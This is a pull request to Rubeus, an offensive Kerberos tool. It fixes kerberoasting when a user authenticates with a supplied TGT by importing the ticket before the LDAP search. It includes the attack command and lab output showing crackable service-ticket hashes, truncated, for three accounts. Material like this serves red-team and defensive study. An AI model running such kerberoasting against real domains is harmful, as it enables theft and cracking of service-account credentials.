### PR TITLE
fixing kerberoasting when using TGT to authenticate but not supplying…

### DIFF
--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -7,6 +7,7 @@ using System.Security.Principal;
 using System.DirectoryServices;
 using System.DirectoryServices.AccountManagement;
 using System.Collections.Generic;
+using Rubeus.lib.Interop;
 
 namespace Rubeus
 {
@@ -331,6 +332,12 @@ namespace Rubeus
                     {
                         Console.WriteLine("[*] Target OU              : {0}", OUName);
                     }
+                }
+
+                if (TGT != null)
+                {
+                    byte[] kirbiBytes = TGT.Encode().Encode();
+                    LSA.ImportTicket(kirbiBytes, new LUID());
                 }
 
                 DirectoryEntry directoryObject = null;


### PR DESCRIPTION
… SPNs

When using a TGT to authenticate from a non domain joined context, Rubeus failed to kerberoast with an unhandled exception, this was due to the LDAP query failing to return any kerberoastable users, eg:

```
C:\temp\Rubeus\Rubeus\bin\Release>.\Rubeus.exe kerberoast /dc:idc1.internal.zeroday.lab /ticket:doIFhDCCBYCgAwIBBa...VybmFsLnplcm9kYXkubGFi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Using a TGT /ticket to request service tickets
[*] Searching path 'LDAP://idc1.internal.zeroday.lab' for Kerberoastable users

[!] Unhandled Rubeus exception:

System.NullReferenceException: Object reference not set to an instance of an object.
   at Rubeus.Roast.Kerberoast(String spn, List`1 spns, String userName, String OUName, String domain, String dc, NetworkCredential cred, String outFile, Boolean simpleOutput, KRB_CRED TGT, Boolean useTGTdeleg, String supportedEType, String pwdSetAfter, String pwdSetBefore, String ldapFilter, Int32 resultLimit, Boolean userStats, Boolean enterprise)
   at Rubeus.Commands.Kerberoast.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
```

Made a small fix by injecting the provided ticket using LSA.ImportTicket before the LDAP query, as DirectoryEntry provides no easy way to use a ticket manually:

```
C:\temp\dev\Rubeus-kerberoast\Rubeus\bin\Release>.\Rubeus.exe kerberoast /dc:idc1.internal.zeroday.lab /ticket:doIFhDCCBYCgAwI...ybmFsLnplcm9kYXkubGFi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Using a TGT /ticket to request service tickets
[+] Ticket successfully imported!
[*] Searching path 'LDAP://idc1.internal.zeroday.lab' for Kerberoastable users

[*] Total kerberoastable users : 3


[*] SamAccountName         : john.green
[*] DistinguishedName      : CN=John Green,OU=CustomOU,DC=internal,DC=zeroday,DC=lab
[*] ServicePrincipalName   : blah/blah
[*] PwdLastSet             : 05/01/2020 16:54:56
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*john.green$internal.zeroday.lab$blah/blah*$AEF7561BDEED7559B103D54B
                             127C4E95$B57BB94E1B1E603ED1CF88296BE19637B56B7B3A3A98E668CAC...68ECFD306674E34D


[*] SamAccountName         : TestUCSPN
[*] DistinguishedName      : CN=Test UC. SPN,OU=CustomOU,DC=internal,DC=zeroday,DC=lab
[*] ServicePrincipalName   : cifs/notexist.internal.zeroday.lab
[*] PwdLastSet             : 15/03/2020 20:25:24
[*] Supported ETypes       : AES256_CTS_HMAC_SHA1_96
[*] Hash                   : $krb5tgs$23$*TestUCSPN$internal.zeroday.lab$cifs/notexist.internal.zeroday.lab*$
                             A303C347CF9A4AF095E07FC50162B36A$99D3F6CAE3735A1A7A9000875CD1AE6274860...DE69EEEC9805C136
                             951D2


[*] SamAccountName         : sqlservice
[*] DistinguishedName      : CN=SQL Service,OU=CustomOU,DC=internal,DC=zeroday,DC=lab
[*] ServicePrincipalName   : MSSQLSvc/ISQL1.internal.zeroday.lab
[*] PwdLastSet             : 02/09/2020 12:05:24
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*sqlservice$internal.zeroday.lab$MSSQLSvc/ISQL1.internal.zeroday.lab
                             *$60E8C89E61E9789AA626A847A5EE5AF9$46883FA266126B9AD0BEAD0D68BB28...DBDEB4
                             6B53925
```

Obviously this could be done manually before running the kerberoast but thought it could be convenient to automate it.